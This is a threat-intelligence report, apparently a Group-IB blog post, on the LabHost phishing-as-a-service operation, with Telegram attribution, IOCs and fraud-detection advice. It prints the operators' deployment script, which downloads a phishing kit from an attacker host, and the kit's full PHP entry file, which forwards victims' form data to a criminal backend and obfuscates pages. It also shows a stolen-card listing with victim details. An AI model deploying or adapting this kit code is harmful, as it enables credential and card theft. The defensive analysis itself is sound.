echo LabHost test cat /etc/*release apt install sudo -y sudo sed -i "s/#precedence ::ffff:0:0\/96 100/precedence ::ffff:0:0\/96 100/" /etc/gai.conf export DEBIAN_FRONTEND=noninteractive apt-get update -y apt-get install -y --force-yes software-properties-common apt-add-repository ppa:ondrej/apache2 -y apt-add-repository ppa:ondrej/php -y apt-get update -y add-apt-repository universe -y apt-get install -o Dpkg::Options::="--force-confdef" -o Dpkg::Options::="--force-confold" -y --force-yes build-essential curl pkg-config zip unzip apache2 apt-get install -o Dpkg::Options::="--force-confdef" -o Dpkg::Options::="--force-confold" -y --force-yes php libapache2-mod-php php-cli php-dev php-pgsql php-sqlite3 php-gd php-curl php-memcached php-imap php-mysql php-mbstring php-xml php-zip php-bcmath php-soap php-intl php-readline php-msgpack php-igbinary php-gmp sudo sed -i '//,/<\/Directory>/ s#AllowOverride None#AllowOverride All#' /etc/apache2/apache2.conf a2enmod rewrite systemctl restart apache2 apt-get update -y apt install unzip -y rm -rf /var/www/html/.htaccess rm -rf /var/www/html/* sudo wget -P /var/www/html --no-check-certificate "https://instapi-1xoa93z90o348fz.co/file-xm3728d/1709912030/global-dhl.zip" sudo unzip /var/www/html/global-dhl.zip -d /var/www/html sudo rm -f /var/www/html/global-dhl.zip sudo chmod -R 755 /var/www/html sudo sed -i 's/{{apikey}}//' /var/www/html/app/init.php sudo sed -i 's#{{url}}#https://api2-4hdfix74ks.co#' /var/www/html/app/init.php sudo systemctl restart apache2
The script for other targets is nearly identical; the only thing that changes is the URL of the phishing-kit archive, and in every case we observed it was hosted on instapi-1xoa93z90o348fz.co.
Another notable finding in the script is the API address that is written into init.php in place of the {{url}} placeholder, api2-4hdfix74ks.co, which is where the subscription is checked.
LabRat aka real-time victim control module
Once a phishing server is set up, a link is generated that can be sent to a victim. When the victim visits the phishing site and passes all filters based on the browser's User-Agent and IP geolocation, the phishing page is shown.
Whenever a victim visits the phishing website, the server sends a request to the API to check that the hardcoded API key is valid and the subscription is active. If both checks succeed, the criminal sees an active session in the panel:
To work with active sessions, criminals use the LabRat module. Despite the name it is not a RAT at all, but a dynamic module for driving fraud scenarios and asking the victim for additional information such as a 2FA code or personal data (date of birth, first and last name, driver's licence number, etc.). It is very similar to the O-panel module implemented in the notorious uAdmin phishing kit.
For example, here it allows the operator to choose from the following scenarios:
While the operator is choosing a scenario, the victim sees a loading stub:
Source codes analysis
Every targeted organization has its own template, but the general structure is the same. For this example we analyse one of the kit archives fetched by the deployment script:
Folder structure
The entry point of this web app is ./app/init.php:
```php
<?php
session_start();
ob_start();

define('HOME_FOLDER', $_SERVER['DOCUMENT_ROOT']);
date_default_timezone_set('Europe/London');

// Both placeholders are replaced by the deployment script: the backend URL and the operator's API key.
$globalurl = '{{url}}';
$apikey = '{{apikey}}';
$route = $_SERVER['REQUEST_URI'];
$url = $globalurl . $route;
$_SERVER['HOST_IP'] = gethostbyname($_SERVER['SERVER_NAME']);

// Everything the victim sent, the whole session and the server environment are forwarded
// to the backend together with the API key on every non-static request.
$post = [
    'post' => isset($_POST) ? $_POST : [],
    'session' => isset($_SESSION) ? $_SESSION : [],
    'server' => isset($_SERVER) ? $_SERVER : [],
    'apikey' => $apikey
];

$splitter = explode('.', $route);
$extension = $splitter[count($splitter) - 1];

$headers = [
    'css' => 'text/css',
    'js' => 'text/javascript',
    'gif' => 'image/gif',
    'html' => 'text/html',
    'htm' => 'text/html',
    'ico' => 'image/vnd.microsoft.icon',
    'jpeg' => 'image/jpeg',
    'jpg' => 'image/jpeg',
    'png' => 'image/png',
    'json' => 'application/json',
    'php' => 'application/x-httpd-php',
    'woff' => 'font/woff',
    'woff2' => 'font/woff2',
    'xml' => 'application/xml',
    'svg' => 'image/svg+xml'
];
$header = isset($headers[$extension]) ? $headers[$extension] : '';

if (empty($header)) {
    // Dynamic route: the backend's JSON reply decides what the victim sees.
    $download = rtrim(downloadString($url, $post), 0);
    $response = json_decode($download, true);
    if (isset($response['session']) && is_array($response['session'])) {
        foreach ($response['session'] as $sname => $sval) {
            $_SESSION[$sname] = $sval;
        }
    }
    //die($download);
    switch ($response['type']) {
        case 0: // render the local template with data supplied by the backend
            $udata = json_decode(json_encode($response['data']));
            break;
        case 1: // redirect (used at the end of a scenario, e.g. to the real website)
            $redirect = !empty($response['redirect']) ? 'location: ' . $response['redirect'] : 'refresh:0';
            header($redirect);
            die();
            break;
        case 2:
            http_response_code(404);
            require_once HOME_FOLDER . '/pages/misc/unavailable.php';
            die();
            break;
        case 3:
            http_response_code(403);
            die();
            break;
        case 4:
            http_response_code(404);
            die();
            break;
        case 5: // subscription suspended
            http_response_code(404);
            require_once HOME_FOLDER . '/pages/misc/suspended.php';
            die();
            break;
    }
    if (empty($download)) {
        http_response_code(404);
        //require_once HOME_FOLDER . '/pages/misc/unavailable.php';
        die();
    }
} else {
    // Static asset: proxied straight from the backend with the matching content type.
    header('Content-type: ' . $header);
    echo downloadString($url);
}

// Proxies a request to the LabHost backend; POSTs the collected data when given.
function downloadString($url, $data = null) {
    $ch = curl_init($url);
    if ($data) {
        curl_setopt($ch, CURLOPT_POST, 1);
        curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($data));
    }
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1');
    curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
    $result = curl_exec($ch);
    $response = $result !== false ? $result : '';
    curl_close($ch);
    return $response;
}

function pdump($var) {
    echo '<pre>';
    var_dump($var);
    echo '</pre>';
    die;
}

function escape($string, $default = '') {
    if (is_array($string)) $string = $default;
    return htmlentities(html_entity_decode($string), ENT_QUOTES, 'UTF-8');
}

function ab_randomstr($length = 8) {
    $randomString = '';
    $characters = implode("", array_merge(range('a', 'z'), range('A', 'Z')));
    for ($i = 0; $i < $length; $i++) $randomString .= $characters[mt_rand(0, strlen($characters) - 1)];
    return $randomString;
}

// Wraps the rendered page in a script that stores each byte as (ord + random offset) and
// rebuilds it client-side with String.fromCharCode, hiding the HTML from static scanners.
function ab_enc($output) {
    $randomFunc = ab_randomstr(mt_rand(6, 12));
    $randomOut = ab_randomstr(mt_rand(6, 12));
    $randomNum = ab_randomstr(mt_rand(6, 12));
    $randomVal = mt_rand(1337, 99999999);
    $return = '<script>' . PHP_EOL;
    $return .= 'var ' . $randomOut . ' = "";' . PHP_EOL;
    $return .= 'var ' . $randomNum . ' = [';
    foreach(str_split($output) as $x) {
        $return .= (ord($x) + $randomVal) . ', ';
    }
    $return = rtrim($return, ', ');
    $return .= '];' . PHP_EOL;
    $return .= $randomNum . '.forEach(function ' . $randomFunc . '(value) { ' . $randomOut . ' += String.fromCharCode(parseInt(value) - ' . $randomVal . '); } );' . PHP_EOL;
    $return .= 'document.write(' . $randomOut . ');';
    $return .= '</script>';
    return $return;
}

// Flushes the output buffer; outside the API routes it appends a screen-width gate that
// sends the wrong device class (desktop for a mobile-only page, or vice versa) to /notfound.
function output($encrypt = false) {
    global $response;
    $device = $response['server']['devices'] ?? '';
    $output = ob_get_contents();
    ob_clean();
    if (strpos($_SERVER["SCRIPT_FILENAME"], 'api') === false) {
        if ($device == '1') {
            $output .= "<script>setTimeout(function() { if (screen.width >= 600) { window.location = '/notfound'; } }, 100);</script>";
        } else if ($device == '2') {
            $output .= "<script>setTimeout(function() { if (screen.width < 600) { window.location = '/notfound'; } }, 100);</script>";
        }
    }
    $die = $encrypt ? ab_enc($output) : $output;
    die($die);
}
```
This code shows that the phishing server holds almost no logic of its own. On every request it forwards the visitor's POST data, session, server variables (including the resolved host IP) and the API key to api2-4hdfix74ks.co (the {{url}} value written in by the deployment script; see the "Creating a phishing site" section above), where the subscription status is checked. Static assets (css, js, images, fonts) are proxied straight from the backend; for every other route the backend's JSON reply decides what happens: type 0 hands the local page template its data, type 1 redirects the victim (for instance to the real website at the end of a scenario), and types 2 to 5 serve the 403/404, "unavailable" or "suspended" pages. Two details of the outbound request are useful indicators for the phishing VPS itself: certificate verification is disabled (CURLOPT_SSL_VERIFYPEER = 0) and the User-Agent is a fixed Firefox 2.0.0.1 string from 2006, which stands out in egress logs. Finally, ab_enc() and output() hide the served HTML from static scanners and from the wrong device class, which matters when an analyst fetches a page from a desktop sandbox.
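Two things a page served by this kit does are worth undoing or detecting during triage: the ab_enc() wrapper and the screen-width gate. The following Python helpers are an added example, not code from the post or from the kit; encode() is a port of ab_enc() used only to build test input, and the sample page is constructed.

```python
"""Triage helpers for pages served by a LabHost-style kit.

Added example, not code from the post or from the kit itself.

  * ab_enc() wraps the whole page in a script that stores every byte as
    (byte + K) in an array and rebuilds the page with String.fromCharCode
    (value - K), using random identifiers and a random K in 1337..99999999.
    decode() recovers the page from that wrapper without running JavaScript.
  * output() appends a screen-width gate that sends the "wrong" device class
    to /notfound; device_gate() reports which class the page is meant for, so
    an analyst knows whether a desktop sandbox would ever see the real content.

encode() is a Python port of ab_enc() used only to build test input; the
sample page below is constructed.
"""
import random
import re
import string

# Constructed sample page with a mobile-only gate appended, as output() would do.
SAMPLE_PAGE = (
    "<html><body><form method='post' action='/login'>"
    "<input name='user'><input name='pass' type='password'></form>"
    "<script>setTimeout(function() { if (screen.width >= 600) "
    "{ window.location = '/notfound'; } }, 100);</script></body></html>"
)

# Matches the array literal and the subtraction key emitted by ab_enc().
AB_ENC_RE = re.compile(
    r"var\s+(?P<arr>\w+)\s*=\s*\[(?P<nums>[\d,\s]*)\];\s*"
    r"(?P=arr)\.forEach\(function\s+\w+\(value\)\s*\{\s*\w+\s*\+=\s*"
    r"String\.fromCharCode\(parseInt\(value\)\s*-\s*(?P<key>\d+)\);",
    re.S,
)
# Matches the device gate appended by output().
GATE_RE = re.compile(
    r"if\s*\(\s*screen\.width\s*(?P<op>>=|<)\s*600\s*\)\s*\{\s*window\.location\s*=\s*'/notfound'"
)


def encode(page, key, rng=None):
    """Port of the kit's ab_enc(): constructed test-input generator."""
    rng = rng or random.Random(1)

    def ident():
        return "".join(rng.choice(string.ascii_letters) for _ in range(rng.randint(6, 12)))

    func, out, arr = ident(), ident(), ident()
    nums = ", ".join(str(b + key) for b in page.encode("utf-8"))
    return (
        "<script>\n"
        f'var {out} = "";\n'
        f"var {arr} = [{nums}];\n"
        f"{arr}.forEach(function {func}(value) {{ {out} += String.fromCharCode(parseInt(value) - {key}); }} );\n"
        f"document.write({out});</script>"
    )


def decode(script):
    """Recover the page wrapped by ab_enc(); None if the wrapper is absent or the
    recovered values are not bytes (which means the key did not match)."""
    m = AB_ENC_RE.search(script)
    if not m:
        return None
    key = int(m.group("key"))
    values = [int(v) for v in m.group("nums").split(",") if v.strip()]
    raw = [v - key for v in values]
    if any(not 0 <= b <= 255 for b in raw):
        return None
    # PHP's str_split()/ord() worked on bytes, so rebuild bytes and decode as UTF-8.
    return bytes(raw).decode("utf-8", errors="replace")


def device_gate(html):
    """'mobile-only' if desktops (>= 600px wide) are bounced, 'desktop-only' if
    phones are, None if the page carries no gate."""
    m = GATE_RE.search(html)
    if not m:
        return None
    return "mobile-only" if m.group("op") == ">=" else "desktop-only"


if __name__ == "__main__":
    wrapped = encode(SAMPLE_PAGE, 4242)
    page = decode(wrapped)
    print("round-trip ok:", page == SAMPLE_PAGE)
    print("device gate:", device_gate(page))
```

When a fetched page decodes to a mobile-only gate, refetch it with a phone User-Agent and a narrow viewport, or strip the gate before rendering; otherwise the sandbox records only the /notfound page and the real form is never captured.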
DarkWeb/Telegram analysis
An investigation of dark web forums and Telegram channels revealed messages about "Labhost" dating back to August 2021.
The service was most actively promoted by three users in Canadian Telegram chats: @MrSmartICQ, @Zimna514 and @houdini13.
The first mentions of "Labhost", from August 24, 2021, were found in the Montreal Telegram chat @mtltrap (🇨🇦𝗠𝗧𝗟 𝗧𝗥𝗔𝗣𝗦𝗧𝗔𝗥𝗦🇨🇦). The chat has since been deleted, but its messages were archived by the Group-IB Threat Intelligence system.
Messages were sent from accounts https://t.me/MrSmartICQ (id 724887901) and https://t.me/houdini13 (id 882956983). Both accounts are still active, have not changed their usernames, and belong to the same individuals as in 2021.
On September 6, 2021, the first message was sent with a link to the Telegram channel https://t.me/labhost.
The channel was created on August 17, 2021, and the first messages appeared on August 29, 2021. The Telegram channel remains active and is still used by “Labhost”.
On September 7, 2021, @MrSmartICQ announced the first domain “LabHost” – https://labhost[.]cc. A similar message was also published on the Telegram channel @labhost.
The third account promoting "LabHost" was https://t.me/Zimna514 (id 2012343631). On October 3, 2021, he posted a message in the Telegram chat @mtltrap with the new domain https://labhost[.]co. Unlike the other two accounts, @Zimna514 has since been deleted.
Houdini13 also owns the service "The Lab Refunds", with the Telegram channels https://t.me/TheLabRefunds and https://t.me/labrefundvouch. This service also operates only in Canada. We assume the scheme works as follows: goods are bought with a stolen card, and the refund is then directed to the threat actor's own card or to a drop's card.
Using stolen accounts or credit card data obtained through phishing, fraudsters buy goods from legitimate online stores such as Amazon, Zara, Puma, Asos and Monos; "The Lab Refunds" then assists them with the refunds.
In August 2023, @houdini13 also advertised a service for spam mailings “Lab Send” (https://t.me/LabSend, https://labsend[.]co).
Besides the clear focus of the "LabHost" service on Canada and its advertising in the Montreal chat, there are further indications that the individuals behind "LabHost" are located in Canada.
This mainly concerns the user @houdini13, who has been selling "Canada profiles" since September 2021.
For this purpose he created the Telegram bot @HoudiniProfiles_Bot, later renamed https://t.me/ProfileShop_Bot, which still works.
We found 115 messages advertising @HoudiniProfiles_Bot in the Telegram chat @mtltrap; all but one were sent by @houdini13. The exception, a message with exactly the same text, was sent by @Zimna514.
In August and September 2021 "LabHost" was advertised by @MrSmartICQ and @houdini13, but from October 2021 onwards by @MrSmartICQ and @Zimna514. We therefore assume that @houdini13 and @Zimna514 belonged to the same person.
The most telling mention of Canada dates from 2021: in the now-deleted Telegram chat @NoirsRefunds, @houdini13 was looking for a Rolex, and by September he was already trying to refund it from Canada.
As for @Zimna514, although the account has now been deleted, the username is very distinctive. A search for "Zimna514" showed that only one person uses this nickname, and that person happens to be a Canadian citizen. At the moment, however, we do not have enough data to assert his involvement with "LabHost".
There is less public information about the account @MrSmartICQ, but it is also associated with Canada.
Even a year before "LabHost" was created, in September 2020, @MrSmartICQ was looking for a database of Canadian profiles.
Interestingly, in 2022 he was looking for a designer to improve his website, and apparently found one.
LabSend spam management service
The LabSend spam service was initially released in 2022. According to its Telegram channel, it is a device-manager platform that facilitates spam campaigns via SMS/MMS messages.
Key Features
- Unlimited Devices
- SMS and MMS Sending
- Syntax Messaging (message randomizer)
- Auto Responder
- Custom Delays
- Message Templates
- Multiple Languages
- Responsive Support
- Constant Updates
The ad also claims that combining LabHost with LabSend maximizes results.
All marketing materials (videos, GUI) are produced in a very professional way, and the subscription is fairly cheap for this kind of service:
Users of LabSend download and install an APK on their Android devices, and then run spam campaigns from the web platform, sending phishing links to victims through those devices.
Group-IB found this APK on VirusTotal, uploaded on 2023-11-20, with SHA1 hash cda695baad4be4f6067195395997360337a43d6f. Our reverse-engineering analysis shows that it uses labsend[.]co and files.labsend[.]co as C2 addresses.
LabCVV Card Shop
On 3 January 2024 the official LabHost Telegram group started advertising the LabCVV credit card shop.
The card shop's UI is very similar to that of the LabHost service. This similarity, and the fact that the shop is promoted by LabHost, lead to the assumption that both services belong to the same criminal group, or at least were developed by the same web designer.
Example of purchased data; note that the listing reproduces the victim's session details captured by the phishing page (browser, OS, IP geolocation, User-Agent) alongside the card data:
```text
|============ Details ===========|
| Full Name:
| Address:
| City: Laval
| Postal Code: H7T 0E2
| Phone:
| DOB: 10/09/1953
|
| Date: 09:15:01pm
| Browser: Mobile Safari
| OS: iOS
| Location: Montreal, Canada
| IP Geo: http://www.geoiptool.com/?IP=142.169.16.238
| User Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 15_5 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.5 Mobile/15E148 Safari/604.1
|
|============ Card Info ===========|
| Card:
| Expiry: 03/23
| Cvv:
|
| Bank:
| Scheme: VISA
| Type: DEBIT
| Brand: TRADITIONAL
| Bin:
| Country: CA
| Prepaid: NON-PREPAID
|
| Time: 09:15:59pm
|
|============ Card Info ===========|
| Card:
| Expiry: 03/23
| Cvv: 413
|
| Bank:
| Scheme: VISA
| Type: DEBIT
| Brand: TRADITIONAL
| Bin:
| Country: CA
| Prepaid: NON-PREPAID |
```
Recommendations
For common users
- Always be cautious and fully aware of anything sent to you, even if you think it may be legitimate.
- Do not click on any links that you are not 100% confident are real
- Double check the address of a website is the official one before you submit any information
- If the link comes from someone you know, confirm with that person using another way of communication
- Contact the organization that sent you the link to confirm they have really sent you that message
- If in doubt, use services like URLScan or VirusTotal to quickly scan the URL you have been sent and look for red flags
- If you think you may be a victim of a phishing attack, immediately contact your bank, the organization being impersonated by the fraudsters, and local law enforcement. They can issue an alert, which may ultimately raise awareness and reduce the victim count.
- Keep in mind that official organizations usually do not use URL shorteners, so links leading to bit.ly, s.id, tny.sh and similar services are very suspicious and you should double-check the final destination
- Report any identified phishing email or SMS to services such as fraudehelpdesk.nl or scamadviser.com and to the organizations being impersonated. These reports help cybersecurity professionals investigate and take action against fraudulent websites, and help protect other potential victims.
For targeted businesses
Fighting this type of threat can be approached in several ways. In order of efficiency:
- Continuous monitoring and detection of phishing websites and their take-down process
- Analysing the infrastructure and taking it down
- A state-of-the-art anti-fraud solution that can detect and block unauthorized logins and transactions
- An investigation focused on identifying the criminals behind the PhaaS.
While the first two approaches can temporarily mitigate the threat, they require continuous investment and do not guarantee 100% coverage.
At Group-IB we advise our corporate customers to investigate the specific scheme and identify the criminals behind it. For financial organizations we recommend Group-IB's Fraud Protection service.
Our Fraud Protection team recommends:
- Continuous surveillance of new threats, starting the phishing-site takedown process as soon as a site is found, using Threat Intelligence and Digital Risk or Brand Protection providers. These services help an organization track illegitimate brand usage and inform defensive priorities.
- Active call detection using session monitoring systems: abnormal call duration, remote access detection, parallel access to a user account from different devices, and access from well-known fraudulent devices.
According to the Group-IB Fraud Matrix, the following detection and mitigation steps are required for this scheme:
Resource Development

Internal mule accounts

Detections:

| Data Source | Data Component | Description |
|---|---|---|
| Sessional Monitoring | Device fingerprinting | Detection of links between unrelated accounts via devices, locations and transactions |

Trust abuse

Mitigations:

| Data Source | Data Component | Description |
|---|---|---|
| Threat intelligence providers | Dark web, instant messages, monitoring | Threat intelligence services help an organization generate its own threat intelligence and track trends to inform defensive priorities to mitigate risk. |
| Digital risk or brand protection providers | Brand abuse | Digital risk or brand protection services help an organization track illegitimate brand usage to inform defensive priorities to mitigate risk. |

Account access

Detections:

| Data Source | Data Component | Description |
|---|---|---|
| Sessional Monitoring | Non-monetary transaction | Parallel access to a user account from different devices |
| Sessional Monitoring | Device fingerprinting | Access from well-known fraudulent devices |

Perform fraud

Detections:

| Data Source | Data Component | Description |
|---|---|---|
| Transaction Monitoring | Real-time transaction monitoring | Flagging unusual patterns such as frequent transfers to newly created or unrelated accounts, high-volume transactions inconsistent with typical customer behaviour, and transfers to accounts with no apparent legitimate connection to the sender. |
| Sessional Monitoring | Device fingerprinting | Detection of links between unrelated accounts via devices, locations and transactions |
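Two of the session-monitoring detections listed above, parallel access to one account from different devices and one device linking several unrelated accounts, are simple enough to show end to end. The following Python is an added example, not Group-IB product code; the login events, account IDs, device fingerprints and IPs are constructed, and the well-known-fraudulent-device check (a lookup against a blocklist) is left out.

```python
"""Session-monitoring detections from the fraud matrix above.

Added example, not Group-IB product code. It runs two of the listed
detections over a constructed stream of login events:

  * parallel_access(): one account used from two different device
    fingerprints within a short window (the LabRat operator replaying
    stolen credentials while the victim is still on the phishing page);
  * device_linking(): one device fingerprint touching several unrelated
    accounts, the link-between-accounts signal listed for mule accounts
    and for the fraud phase.

Timestamps, account IDs, fingerprints and IPs are constructed.
"""
from collections import defaultdict
from datetime import datetime

OVERLAP_SECONDS = 300   # two different devices inside 5 minutes counts as "parallel"
LINK_THRESHOLD = 3      # a device seen on >= 3 accounts is flagged

# (timestamp, account, device fingerprint, client IP), constructed
EVENTS = [
    ("2024-02-12T09:15:00", "acct-1001", "fp-victim-A", "192.0.2.10"),
    ("2024-02-12T09:16:30", "acct-1001", "fp-operator", "203.0.113.5"),
    ("2024-02-12T09:40:00", "acct-1002", "fp-operator", "203.0.113.5"),
    ("2024-02-12T10:05:00", "acct-1003", "fp-operator", "203.0.113.5"),
    ("2024-02-12T11:00:00", "acct-2001", "fp-victim-B", "192.0.2.44"),
    ("2024-02-12T11:30:00", "acct-2001", "fp-victim-B", "192.0.2.44"),
    ("2024-02-12T12:00:00", "acct-2002", "fp-victim-C", "192.0.2.51"),
    ("2024-02-12T15:00:00", "acct-2002", "fp-victim-D", "192.0.2.52"),  # new phone hours later: not parallel
]


def _rows_by_account(events):
    """Group events per account as (datetime, fingerprint, ip), sorted by time."""
    by_acct = defaultdict(list)
    for ts, acct, fp, ip in events:
        by_acct[acct].append((datetime.fromisoformat(ts), fp, ip))
    for rows in by_acct.values():
        rows.sort()
    return by_acct


def parallel_access(events, window=OVERLAP_SECONDS):
    """Alerts for accounts seen from two different fingerprints within `window` seconds."""
    alerts = []
    for acct, rows in _rows_by_account(events).items():
        for i, (t1, fp1, ip1) in enumerate(rows):
            # Look back at earlier logins that are still inside the window.
            for t0, fp0, _ip0 in reversed(rows[:i]):
                if (t1 - t0).total_seconds() > window:
                    break           # rows are sorted, so everything earlier is older still
                if fp0 != fp1:
                    alerts.append({"account": acct, "first_device": fp0, "second_device": fp1,
                                   "second_ip": ip1, "gap_s": int((t1 - t0).total_seconds())})
                    break           # one alert per login is enough
    return alerts


def device_linking(events, threshold=LINK_THRESHOLD):
    """Fingerprints that appear on at least `threshold` distinct accounts."""
    accounts = defaultdict(set)
    for _ts, acct, fp, _ip in events:
        accounts[fp].add(acct)
    return {fp: sorted(a) for fp, a in accounts.items() if len(a) >= threshold}


if __name__ == "__main__":
    for a in parallel_access(EVENTS):
        print("parallel access:", a)
    for fp, accts in device_linking(EVENTS).items():
        print("device linking:", fp, "->", accts)
```

The window and threshold are the tuning knobs: a short window catches the operator logging in while the victim is still being guided by LabRat, while the account-count threshold separates a shared family tablet from a device that walks through a list of stolen logins.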
IOCs
Fraudulent infrastructure
| Domain name | Registrar | IP address | Date of activity |
|---|---|---|---|
| lab-host.ru | nic.ru, Russia | 45.148.244.237 | July 2023 – Now |
| labcvv.su | nic.ru, Russia | 104.21.38.192 | August 2022 – Now |
| labsend.co | namecheap.com, US | 188.214.128.63 | December 2023 – Now |
| api2-4hdfix74ks.co | namesilo.com, US | 188.114.96.1 | June 2023 – Now |
| instapi-1xoa93z90o348fz.co | namesilo.com, US | 188.114.96.1 | June 2023 – Now |
| labhost.ru | reg.ru, Russia | 185.178.208.34 | November 2021 – December 2022 |
| labhost.xyz | nic.ru, Russia | 109.70.26.37 | November 2021 |
| labhost.co | tucows.com, Canada | 185.178.208.34 | October 2021 |
| labhost.cc | namesilo.com, US | 185.178.208.34 | September 2021 |
| labhost-alt1.ru | nic.ru, Russia | – | – |
| labhost-backup.ru | nic.ru, Russia | 91.215.43.242 | February 2024 – Now |

Note that 104.21.38.192 and 188.114.96.1 are Cloudflare edge addresses: they identify the reverse proxy in front of the site, not the origin server, and should not be used as blocking indicators on their own.
Phishing pages belonging to the LabHost owners

| Domain name | Registrar | IP address |
|---|---|---|
| climateactionincentive-resident.info | namesilo.com, US | 45.148.244.237 |
| yearlygift-freedommobile.info | namesilo.com, US | 159.253.120.116 |
| thisisyours.top | namesilo.com, US | 159.253.120.116 |
| sdn-hme.top | namesilo.com, US | 159.253.120.116 |
| rogers-yearlygift.info | namesilo.com, US | 159.253.120.116 |
| resimaigu.info | namesilo.com, US | 159.253.120.116 |
| online-icd-zco-db.top | namesilo.com, US | 159.253.120.116 |
| lnk-online.top | namesilo.com, US | 159.253.120.116 |
| imthenew.top | namesilo.com, US | 159.253.120.116 |
| grdn-hme.top | namesilo.com, US | 159.253.120.116 |
| gdn-hme.top | namesilo.com, US | 159.253.120.116 |
| freedommobile-giftpay.info | namesilo.com, US | 159.253.120.116 |
| freedommobile-gift.info | namesilo.com, US | 159.253.120.116 |
| elmaronf.info | namesilo.com, US | 159.253.120.116 |
| caip-deposit-rebate.info | namesilo.com, US | 159.253.120.116 |
| scribbledromance.live | namesilo.com, US | 159.253.120.116 |
| online-db-batch.top | namesilo.com, US | 159.253.120.116 |
| icd-zco.gdn-hme.top | namesilo.com, US | 159.253.120.116 |
| freedom-yearlygift.info | namesilo.com, US | 159.253.120.116 |
| clients.groupe-dn.info | namesilo.com, US | 159.253.120.116 |
| gov-return-cad.info | namesilo.com, US | 185.113.8.38 |
| freedommobile-credit.info | namesilo.com, US | 185.113.8.38 |
| freedommobile-credit.com | Nicenic.NET, Hong Kong | 185.113.8.38 |
| climateactionincentive-rebatepay.info | namesilo.com, US | 185.113.8.38 |
https://www.group-ib.com/blog/labhost-operation